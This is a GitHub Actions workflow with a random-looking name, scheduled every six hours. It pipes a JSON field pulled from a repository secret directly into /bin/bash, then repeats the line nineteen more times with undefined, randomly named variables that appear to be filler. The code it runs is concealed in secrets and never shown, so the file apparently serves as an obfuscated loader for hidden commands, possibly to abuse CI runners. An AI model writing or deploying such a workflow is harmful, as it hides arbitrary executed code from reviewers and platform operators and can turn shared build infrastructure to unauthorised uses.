name: xishanyanhoukl

on:
  workflow_dispatch:
  schedule:
    - cron: '20 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xishanyanhoukl
        env:
          n75: ${{ secrets.n75 }}
        run: |
          echo $n75 | jq -r .ea0120 | /bin/bash
          echo $p835 | jq -r .oaryo381 | /bin/bash
          echo $lrh55 | jq -r .zhic70 | /bin/bash
          echo $pujix33575 | jq -r .zgyqc41 | /bin/bash
          echo $cal03 | jq -r .wa46827 | /bin/bash
          echo $xrzzm24503 | jq -r .bsuv234 | /bin/bash
          echo $kkudc31688 | jq -r .ltb0673 | /bin/bash
          echo $bsf32 | jq -r .a40150 | /bin/bash
          echo $cjk5078 | jq -r .frdis88759 | /bin/bash
          echo $un608 | jq -r .rafki70 | /bin/bash
          echo $jz39 | jq -r .wuey279 | /bin/bash
          echo $vyn38648 | jq -r .gu67 | /bin/bash
          echo $yybf849 | jq -r .lflya3777 | /bin/bash
          echo $ba34845 | jq -r .tcc8791 | /bin/bash
          echo $wwiwk335 | jq -r .h32 | /bin/bash
          echo $mgu26046 | jq -r .li8 | /bin/bash
          echo $tz0 | jq -r .xln332 | /bin/bash
          echo $pvt07 | jq -r .pjpsl531 | /bin/bash
          echo $u42747 | jq -r .ej92 | /bin/bash
          echo $fwl0549 | jq -r .cq9705 | /bin/bash

